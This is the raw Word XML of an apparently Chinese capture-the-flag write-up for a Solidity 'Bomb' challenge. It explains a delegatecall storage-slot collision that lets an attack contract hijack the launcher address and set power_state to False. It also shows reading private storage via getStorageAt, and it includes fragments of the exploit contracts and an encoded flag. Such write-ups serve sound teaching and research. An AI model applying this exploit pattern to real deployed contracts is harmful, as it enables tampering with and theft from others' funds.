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D9F" w:rsidRDefault="00C63D9F" w:rsidP="00C63D9F">
      <w:r>
        <w:t>本题的首要考点是delegatecall与call的不同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63D9F" w:rsidRDefault="00C63D9F" w:rsidP="00C63D9F">
      <w:r>
        <w:t>- delegatecall 虽然执行其他合约的函数，但是函数功能的作用域确实本合约</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63D9F" w:rsidRDefault="00C63D9F" w:rsidP="00C63D9F">
      <w:r>
        <w:t>- call函数则会在被调用合约的作用域下进行变量修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63D9F" w:rsidRDefault="00C63D9F"/>
    <w:p w:rsidR="004C0717" w:rsidRDefault="00AE3930">
      <w:r w:rsidRPr="00AE3930">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49690AAA" wp14:editId="33C3A578">
            <wp:extent cx="5274310" cy="1887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30" w:rsidRDefault="00AE3930">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目中的Bomb合约会调用</w:t>
      </w:r>
      <w:r>
        <w:t>Launcher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">setdeadline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3930" w:rsidRDefault="00AE3930">
      <w:r>
        <w:t xml:space="preserve">Setdeadline </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的功能是修改Launcher中的deadline变量。</w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eadline是Launcher的第一个slot，长度为3</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bytes。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3930" w:rsidRDefault="00AE3930">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于delegateCall特性，Bomb合约中的前3</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bytes会被修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3930" w:rsidRDefault="00AE3930">
      <w:r w:rsidRPr="00AE3930">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60909272" wp14:editId="64D94076">
            <wp:extent cx="2634495" cy="979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39" cy="9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30" w:rsidRDefault="00AE3930">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即launcher</w:t>
      </w:r>
      <w:r>
        <w:t>_address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可被覆盖为其他地址。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3930" w:rsidRDefault="00AE3930">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说如果第一次调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3930">
        <w:t>setCountDownTimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数时，参数填入attack合约地址。那么第二次调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3930">
        <w:t>setCountDownTimer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，</w:t>
      </w:r>
      <w:r>
        <w:t>Setdeadline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数就是attack的</w:t>
      </w:r>
      <w:r>
        <w:t>Setdeadline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。从而可以对Bomb合约进行任意修改。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE3930" w:rsidRDefault="00AE3930">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而完成题目要求——将</w:t>
      </w:r>
      <w:r>
        <w:t>power_state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改为False</w:t>
      </w:r>
      <w:r w:rsidR="00DB4CCF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB4CCF" w:rsidRDefault="00DB4CCF"/>
    <w:p w:rsidR="00DB4CCF" w:rsidRDefault="00DB4CCF"/>
    <w:p w:rsidR="00DB4CCF" w:rsidRDefault="00DB4CCF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本题目的次要考点是private成员的数据读取，需要使用</w:t>
      </w:r>
      <w:r>
        <w:t>web3.eth.getStorageAt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB4CCF" w:rsidRDefault="00C82DE1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时需要选手根据password的</w:t>
      </w:r>
      <w:r w:rsidR="007D7640">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检查格式，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自己组织一下transaction的data</w:t>
      </w:r>
      <w:r w:rsidR="007D7640">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D7640" w:rsidRDefault="007D7640">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D7640">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DE27F60" wp14:editId="05B0EC27">
            <wp:extent cx="3171625" cy="1007695"/>
            <wp:effectExtent l="0" t="0" r="381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425" cy="10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CF" w:rsidRDefault="00DB4CCF"/>
    <w:p w:rsidR="007D7640" w:rsidRDefault="007D7640"/>
    <w:p w:rsidR="007D7640" w:rsidRDefault="007D7640">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最终题目EXP如下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640" w:rsidTr="007D7640">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007D7640" w:rsidRDefault="007D7640" w:rsidP="007D7640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1080"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>contract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LauncherAttack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uint256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deadline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power_state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settimer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uint256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_deadline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deadline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_deadline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power_state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Launcher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deadline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block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number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1080"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>contract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attack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Bomb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attack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targetContractAddress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//b.setCountDownTimer(expAddress);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targetContractAddress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call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bytes4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keccak256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"setCountDownTimer(uint256)"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0x000000000000666c61677b646f6e4c65745572447265616d4265447265616d7d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targetContractAddress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call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bytes4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keccak256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"setCountDownTimer(uint256)"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:rsidR="007D7640" w:rsidRPr="007D7640" w:rsidRDefault="007D7640" w:rsidP="007D7640">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              <w:spacing w:line="270" w:lineRule="atLeas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:rsidR="007D7640" w:rsidRDefault="007D7640"/>
    <w:p w:rsidR="00522661" w:rsidRDefault="00522661">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先部署</w:t>
      </w:r>
      <w:r>
        <w:t>LauncherAttack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>合约，然后以其Address为expAddress参数，题目合约地址为targetContractAddress参数，部署attack合约。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00754AEB" w:rsidRDefault="00522661">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>便可修改Bomb的power</w:t>
      </w:r>
      <w:r>
        <w:t>_state</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00522661" w:rsidRPr="00DB4CCF" w:rsidRDefault="0090428E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而获得flag。</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00522661" w:rsidRPr="00DB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9F"/>
    <w:rsid w:val="001A0484"/>
    <w:rsid w:val="004C0717"/>
    <w:rsid w:val="00522661"/>
    <w:rsid w:val="00754AEB"/>
    <w:rsid w:val="007D7640"/>
    <w:rsid w:val="0090428E"/>
    <w:rsid w:val="00944027"/>
    <w:rsid w:val="00AE3930"/>
    <w:rsid w:val="00C12356"/>
    <w:rsid w:val="00C63D9F"/>
    <w:rsid w:val="00C82DE1"/>
    <w:rsid w:val="00D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5D658"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{029FF83E-78A0-EE44-BB47-A25412A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leepandapia@gmail.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>leepandapia@gmail.com</cp:lastModifiedBy>
  <cp:revision>15</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-01T05:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-01T05:22:00Z</dcterms:modified>
</cp:coreProperties>
</file>